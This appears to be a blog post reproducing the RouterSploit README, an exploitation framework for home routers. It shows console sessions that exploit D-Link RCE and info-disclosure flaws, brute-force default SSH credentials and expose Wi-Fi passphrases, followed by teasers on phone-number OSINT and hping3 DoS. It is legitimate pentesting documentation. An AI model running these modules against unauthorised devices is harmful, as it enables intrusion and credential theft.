Skip to main content

routersploit: Router Exploitation Framework

By

 

RouterSploit

 Router Exploitation Framework

github download source

Installation

Requirements

  • gnureadline (OSX only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp

Installation on Kali

git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py

Installation on Ubuntu 16.04

sudo apt-get install python-dev python-pip libncurses5-dev git
git clone https://github.com/reverse-shell/routersploit
cd routersploit
pip install -r requirements.txt
./rsf.py

Installation on OSX

git clone https://github.com/reverse-shell/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt
./rsf.py

Running on Docker

git clone https://github.com/reverse-shell/routersploit
cd routersploit
docker build -t routersploit:latest -f Dockerfile .
./run_docker.sh

Update

Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull

Usage

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Wildest Dreams
 Version  : 1.0.0

rsf >

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/ 
 exploits/asmax/ 
 exploits/asus/ 
 exploits/cisco/ 
 exploits/dlink/ 
 exploits/fortinet/ 
 exploits/juniper/ 
 exploits/linksys/   exploits/multi/     exploits/netgear/
0rsf > use exploits/dlink/dir_300_600_rce
 
 rsf (D-LINK DIR-300 & DIR-600 RCE) >
You can use the tab key for completion.

Options

Display module options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target Port
Set options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module

You can exploit the target by issuing the 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
It is also possible to check if the target is vulnerable to particular exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info

Display information about exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits
 D-Link DIR-300, 
DIR-600 
Remote Code Execution vulnerability 
which allows executing command on operating system level with root privileges.

Devices:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References
:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module

Modules located in the creds/ directory allow running dictionary attacks against various network services.
The following services are currently supported:
  • ftp
  • ssh
  • telnet
  • http basic auth
  • http digest auth
  • http form auth
  • snmp
Every service has been divided into two modules:
  • default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
Console:
rsf > use creds/
creds/ftp_bruteforce 
 creds/http_basic_bruteforce
 creds/http_form_bruteforce 
 creds/snmp_bruteforce 
 creds/ssh_default 
 creds/telnet_default         
creds/ftp_default 
 creds/http_basic_default 
 creds/http_form_default 
 creds/ssh_bruteforce 
 creds/telnet_bruteforce      
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

Options

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings  Description                                              
   ----         ----------------     -----------                                              
   threads      8     Numbers of threads 
 
 defaults 
 file:///root/git/routersploit/routersploit/wordlists/defaults.txt 
 
 User:Pass or file with default credentials (file://)
Set target:

rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module

rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) >

3. Scanners

Scanners allow you to quickly verify if the target is vulnerable to any exploits.

Pick module

rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port
Set target:
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module

rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
 - exploits/dlink/dwr_932_info_disclosure
It has been verified that the target is vulnerable to dwr_932_info_disclosure exploit. Now use the proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

   Parameter                  Value                                                                                                 
   ---------                  -----                                                                                                 
   get_wps_enable             0                                                                                                     
   wifi_AP1_enable            1                                                                                                     
   get_client_list 
 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>4
 
0:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0     
   wifi_AP1_ssid              dlink-DWR-932                                                                                         
   get_mac_address            c4:00:f5:00:ec:40                                                                                     
   wifi_AP1_security_mode     3208,8                                                                                                
   wifi_AP1_hidden            0                                                                                                     
   get_mac_filter_switch      0                                                                                                     
   wifi_AP1_passphrase        MyPaSsPhRaSe                                                                                          
   get_wps_mode               0

License

The RouterSploit Framework is under a BSD license. Please see LICENSE for more details.
Labels:

Comments

Post a Comment

Popular posts from this blog

Find Identifying Information from a Phone Number Using OSINT Tools

By
Find Identifying Information from a Phone Number Using OSINT Tools Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts. While a phone number may not seem like much information to give out, an OSINT researcher can quickly discover information that ties a phone number to a variety of other clues. The data can be used to detect whether a phone number is a throwaway VoIP number used to hide the owner's identity or a cell phone belonging to a real person. In the event of buying something online or replying to an apartment ad,...
Post a Comment
Read more

Scan Live hosts using Netdiscover in Kali Linux

By
Scan Live hosts using Netdiscover in Kali Linux Netdiscover is a simple tool to use.It uses (ARP)Address Resolution Protocol to find live hosts.Netdiscover discovers live hosts on a network but you must be connected to that network.  Netdiscover not only finds the live hosts also returns mac addresses and hostname. netdiscover is an active/passive arp reconnaissance tool, initially developed to gain information about wireless networks without dhcp servers in wardriving scenarios.  It can also be used on switched net‐ works. Built on top of libnet and libpcap, it can passively detect online hosts or search for them by sending arp requests. Start Netdiscover With the below command you can see all the options that we can use with netdiscover. root@seven:~# netdiscover -h  Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool] -  i device: your network device ...
Post a Comment
Read more

How to use hping3 in kali Linux(Performing dos attack)

By
How to use hping3 in kali Linux (Performing dos attack) What is hping3 hping3 is a network tool able to send custom TCP/IP packets and to dis‐ play target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Hping3 is extremely powerful you can do following things with hping3 Test firewall rules Advanced port scanning Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. Path MTU discovery Transferring files between even really fascist firewall rules. Traceroute-like under different protocols. Firewalk-like usage. What is dos Attack Dos stands for denial of service. Dos attack shuts down Webservers/systems and completely makes them inaccessible to users. Dos attack floods target network with excess ...
Post a Comment
Read more